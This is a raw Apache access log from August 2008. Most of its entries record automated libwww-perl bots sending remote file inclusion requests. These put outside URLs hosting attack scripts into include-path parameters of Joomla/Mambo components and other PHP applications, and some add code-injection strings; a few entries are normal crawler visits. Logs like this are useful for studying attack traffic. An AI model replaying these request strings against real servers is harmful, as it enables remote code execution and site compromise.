66.115.174.234 - - [21/Aug/2008:22:16:41 -0500] "GET //claroline/tracking/userLog.php?rootSys=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
87.226.77.5 - - [21/Aug/2008:22:16:42 -0500] "GET /logs/access_log.1206230400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 358 "-""libwww-perl/5.812"
87.226.77.5 - - [21/Aug/2008:22:17:10 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
87.226.77.5 - - [21/Aug/2008:22:17:10 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 331 "-""libwww-perl/5.812"
216.235.247.169 - - [21/Aug/2008:22:17:25 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
216.235.247.169 - - [21/Aug/2008:22:17:25 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
85.13.194.38 - - [21/Aug/2008:22:18:14 -0500] "GET /logs/access_log.1192924800/index.php?go=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
216.235.247.169 - - [21/Aug/2008:22:18:33 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 200 96221 "-""libwww-perl/5.805"
216.235.247.169 - - [21/Aug/2008:22:18:33 -0500] "GET //?path%5Bdocroot%5D=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
66.115.174.234 - - [21/Aug/2008:22:18:55 -0500] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
66.115.174.234 - - [21/Aug/2008:22:18:55 -0500] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
65.39.140.181 - - [21/Aug/2008:22:19:18 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
65.39.140.181 - - [21/Aug/2008:22:19:18 -0500] "GET //?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
65.39.140.181 - - [21/Aug/2008:22:19:19 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 200 96221 "-""libwww-perl/5.79"
77.221.130.9 - - [21/Aug/2008:22:19:35 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
77.221.130.9 - - [21/Aug/2008:22:19:36 -0500] "GET //?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
77.221.130.9 - - [21/Aug/2008:22:19:37 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 200 96221 "-""libwww-perl/5.803"
87.238.163.18 - - [21/Aug/2008:22:20:20 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
87.238.163.18 - - [21/Aug/2008:22:20:20 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
77.221.130.9 - - [21/Aug/2008:22:23:15 -0500] "GET //?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
87.230.21.231 - - [21/Aug/2008:22:23:26 -0500] "GET /logs/access_log.1214524800//atom.php5?page=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
87.230.21.231 - - [21/Aug/2008:22:23:26 -0500] "GET //atom.php5?page=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.230.21.231 - - [21/Aug/2008:22:23:26 -0500] "GET /logs//atom.php5?page=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
216.235.247.169 - - [21/Aug/2008:22:23:38 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
216.235.247.169 - - [21/Aug/2008:22:23:38 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
87.230.21.231 - - [21/Aug/2008:22:23:39 -0500] "GET /logs/access_log.1214438400//atom.php5?page=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
65.39.140.181 - - [21/Aug/2008:22:27:54 -0500] "GET //?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
66.115.174.234 - - [21/Aug/2008:22:31:07 -0500] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
66.115.174.234 - - [21/Aug/2008:22:31:07 -0500] "GET //claroline/phpbb/page_tail.php?includePath=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
88.191.62.117 - - [21/Aug/2008:22:31:21 -0500] "GET /logs/db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
88.191.62.117 - - [21/Aug/2008:22:31:21 -0500] "GET /db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 290 "-""libwww-perl/5.803"
89.218.85.18 - - [21/Aug/2008:22:33:12 -0500] "GET /logs/access_log.1214438400%22%20%20lang=%22de%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1214438400&lp=de_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22de%22%3E...%202008:19:00:30%20-0500]%20%22GET%20/logs/db.php?path_local=ftp:/24.227.40.218/temp/trem/oldbisok?%20...%2022:06%20-0500]%20%22GET%20/db.php?path_local=http:/xxxxxx.xxxxx.xxx.%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1214438400%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%20indent%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7I7Mq5IJyQAJGVXNyoA;_ylu=X3oDMTB0bmlybmF1BHNlYwNzcgRwb3MDMjM2BGNvbG8DYWMyBHZ0aWQD/SIG=12b9m73f5/EXP=1219462075/**http%3a/tomdolan.pconline.com/logs/access_log.1214524800/db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 442 "-""libwww-perl/5.805"
89.218.85.18 - - [21/Aug/2008:22:33:12 -0500] "GET /db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
89.218.85.18 - - [21/Aug/2008:22:33:13 -0500] "GET /logs/access_log.1214438400%22%20%20lang=%22de%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1214438400&lp=de_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22de%22%3E...%202008:19:00:30%20-0500]%20%22GET%20/logs/db.php?path_local=ftp:/24.227.40.218/temp/trem/oldbisok?%20...%2022:06%20-0500]%20%22GET%20/db.php?path_local=http:/xxxxxx.xxxxx.xxx.%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1214438400%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%20indent%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7I7Mq5IJyQAJGVXNyoA;_ylu=X3oDMTB0bmlybmF1BHNlYwNzcgRwb3MDMjM2BGNvbG8DYWMyBHZ0aWQD/SIG=12b9m73f5/EXP=1219462075/**http%3a/tomdolan.pconline.com/logs/db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 442 "-""libwww-perl/5.805"
72.29.68.128 - - [21/Aug/2008:22:33:45 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
72.29.68.128 - - [21/Aug/2008:22:33:45 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
38.99.44.104 - - [21/Aug/2008:22:35:34 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
89.218.85.18 - - [21/Aug/2008:22:35:39 -0500] "GET /logs/db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.218.85.18 - - [21/Aug/2008:22:35:40 -0500] "GET /db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
88.191.62.117 - - [21/Aug/2008:22:36:02 -0500] "GET /db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 290 "-""libwww-perl/5.803"
88.191.62.117 - - [21/Aug/2008:22:36:14 -0500] "GET /logs/access_log.1214524800/db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
88.191.62.117 - - [21/Aug/2008:22:36:14 -0500] "GET /db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 290 "-""libwww-perl/5.803"
88.191.62.117 - - [21/Aug/2008:22:36:14 -0500] "GET /logs/db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
77.221.130.9 - - [21/Aug/2008:22:37:19 -0500] "GET /logs/access_log.1214524800//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
74.6.8.121 - - [21/Aug/2008:22:37:47 -0500] "GET /logs/access_log.1211500800 HTTP/1.0" 200 353639 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
88.191.62.117 - - [21/Aug/2008:22:38:00 -0500] "GET /logs/access_log.1208217600/db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
219.117.239.114 - - [21/Aug/2008:22:39:16 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://luisjara.cl/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
219.117.239.114 - - [21/Aug/2008:22:39:16 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://luisjara.cl/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
89.218.85.18 - - [21/Aug/2008:22:39:18 -0500] "GET /db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
65.39.140.181 - - [21/Aug/2008:22:40:12 -0500] "GET /logs/access_log.1214524800//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
88.191.62.117 - - [21/Aug/2008:22:40:23 -0500] "GET /logs/access_log.1214438400/db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
89.218.85.18 - - [21/Aug/2008:22:40:51 -0500] "GET /logs/access_log.1214524800/db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
89.218.85.18 - - [21/Aug/2008:22:40:51 -0500] "GET /db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
89.218.85.18 - - [21/Aug/2008:22:40:52 -0500] "GET /logs/db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
88.191.62.117 - - [21/Aug/2008:22:42:29 -0500] "GET /logs/access_log.1213488000/db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
89.218.85.18 - - [21/Aug/2008:22:43:18 -0500] "GET /logs/access_log.1208217600/db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
190.138.152.162 - - [21/Aug/2008:22:44:28 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
190.138.152.162 - - [21/Aug/2008:22:44:28 -0500] "GET ///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
190.138.152.162 - - [21/Aug/2008:22:44:30 -0500] "GET /logs///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
190.138.152.162 - - [21/Aug/2008:22:44:50 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
66.115.174.234 - - [21/Aug/2008:22:45:49 -0500] "GET /logs/access_log.1211500800//claroline/tracking/userLog.php?rootSys=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
88.191.62.117 - - [21/Aug/2008:22:46:12 -0500] "GET /logs/home.php?pagina=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
88.191.62.117 - - [21/Aug/2008:22:46:12 -0500] "GET /home.php?pagina=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
209.249.86.17 - - [21/Aug/2008:22:47:49 -0500] "GET /?N=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
209.249.86.17 - - [21/Aug/2008:22:47:50 -0500] "GET /icons/blank.gif HTTP/1.0" 200 148 "http://tomdolan.pconline.com/?N=A""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
209.249.86.17 - - [21/Aug/2008:22:47:50 -0500] "GET /icons/folder.gif HTTP/1.0" 200 225 "http://tomdolan.pconline.com/?N=A""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
209.249.86.17 - - [21/Aug/2008:22:47:50 -0500] "GET /icons/back.gif HTTP/1.0" 200 216 "http://tomdolan.pconline.com/?N=A""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
209.249.86.17 - - [21/Aug/2008:22:47:50 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
209.249.86.17 - - [21/Aug/2008:22:47:50 -0500] "GET /?N=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
89.218.85.18 - - [21/Aug/2008:22:48:03 -0500] "GET /logs/access_log.1214438400/db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
190.138.152.162 - - [21/Aug/2008:22:48:55 -0500] "GET /logs/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
190.138.152.162 - - [21/Aug/2008:22:48:55 -0500] "GET /errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.70.83.4 - - [21/Aug/2008:22:49:04 -0500] "GET /logs/errors.php?error=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
202.70.83.4 - - [21/Aug/2008:22:49:05 -0500] "GET /errors.php?error=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
77.221.130.9 - - [21/Aug/2008:22:49:17 -0500] "GET /logs/access_log.1214438400//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
89.218.85.18 - - [21/Aug/2008:22:50:59 -0500] "GET /logs/access_log.1213488000/db.php?path_local=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
74.6.8.121 - - [21/Aug/2008:22:51:59 -0500] "GET /logs/access_log.1179100800 HTTP/1.0" 200 144906 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
202.70.83.4 - - [21/Aug/2008:22:52:05 -0500] "GET /logs//main.php?sayfa=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
202.70.83.4 - - [21/Aug/2008:22:52:05 -0500] "GET //main.php?sayfa=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
65.39.140.181 - - [21/Aug/2008:22:52:13 -0500] "GET /logs/access_log.1214438400//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
208.226.79.133 - - [21/Aug/2008:22:52:25 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
208.226.79.133 - - [21/Aug/2008:22:52:26 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
72.29.68.128 - - [21/Aug/2008:22:52:50 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
72.29.68.128 - - [21/Aug/2008:22:52:51 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
66.249.71.39 - - [21/Aug/2008:22:53:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.39 - - [21/Aug/2008:22:53:12 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.126.254.80 - - [21/Aug/2008:22:53:12 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
209.126.254.80 - - [21/Aug/2008:22:53:12 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
77.221.130.9 - - [21/Aug/2008:22:54:01 -0500] "GET /logs/access_log.1206748800//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
77.221.130.9 - - [21/Aug/2008:22:54:21 -0500] "GET /logs/access_log.1213488000//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
219.117.239.114 - - [21/Aug/2008:22:54:53 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://luisjara.cl/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
219.117.239.114 - - [21/Aug/2008:22:54:54 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://luisjara.cl/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
89.218.85.18 - - [21/Aug/2008:22:56:46 -0500] "GET /logs/home.php?pagina=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
89.218.85.18 - - [21/Aug/2008:22:56:46 -0500] "GET /home.php?pagina=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
213.33.84.163 - - [21/Aug/2008:22:57:17 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
213.33.84.163 - - [21/Aug/2008:22:57:17 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
66.115.174.234 - - [21/Aug/2008:22:57:22 -0500] "GET /logs//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
66.115.174.234 - - [21/Aug/2008:22:57:23 -0500] "GET //plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
74.6.8.121 - - [21/Aug/2008:22:57:23 -0500] "GET /logs/access_log.1201737600 HTTP/1.0" 200 230360 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.238.163.18 - - [21/Aug/2008:22:58:39 -0500] "GET /logs/access_log.1203724800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.238.163.18 - - [21/Aug/2008:22:58:39 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.235.247.169 - - [21/Aug/2008:22:58:39 -0500] "GET /phphtml.php?htmlclass_path=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.238.163.18 - - [21/Aug/2008:22:58:40 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.238.163.18 - - [21/Aug/2008:22:59:11 -0500] "GET /logs/access_log.1209600000//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.39.140.181 - - [21/Aug/2008:22:59:33 -0500] "GET /logs/access_log.1206748800//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
65.39.140.181 - - [21/Aug/2008:22:59:51 -0500] "GET /logs/access_log.1213488000//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
77.221.130.9 - - [21/Aug/2008:23:00:45 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
77.221.130.9 - - [21/Aug/2008:23:00:45 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
81.169.137.253 - - [21/Aug/2008:23:01:49 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
81.169.137.253 - - [21/Aug/2008:23:01:49 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
209.126.254.80 - - [21/Aug/2008:23:02:40 -0500] "GET /logs/access_log.1206230400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.126.254.80 - - [21/Aug/2008:23:02:40 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.126.254.80 - - [21/Aug/2008:23:02:40 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
202.70.83.4 - - [21/Aug/2008:23:04:02 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.tsw.ru/ips.txt? HTTP/1.1" 200 96221 "-""libwww-perl/5.803"
202.70.83.4 - - [21/Aug/2008:23:04:04 -0500] "GET //?path%5Bdocroot%5D=http://www.tsw.ru/ips.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
211.141.87.6 - - [21/Aug/2008:23:05:36 -0500] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 96216 "-""libwww-perl/5.805"
211.141.87.6 - - [21/Aug/2008:23:05:37 -0500] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
190.138.152.162 - - [21/Aug/2008:23:07:10 -0500] "GET /logs/access_log.1206230400/!scanhttp://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
190.138.152.162 - - [21/Aug/2008:23:07:10 -0500] "GET /!scanhttp://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
190.138.152.162 - - [21/Aug/2008:23:07:11 -0500] "GET /logs/!scanhttp://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
74.6.18.243 - - [21/Aug/2008:23:07:21 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.98.217 - - [21/Aug/2008:23:07:21 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
202.70.83.4 - - [21/Aug/2008:23:09:29 -0500] "GET /phphtml.php?htmlclass_path=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
190.138.152.162 - - [21/Aug/2008:23:11:02 -0500] "GET /logs/access_log.1206748800/!scanhttp://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
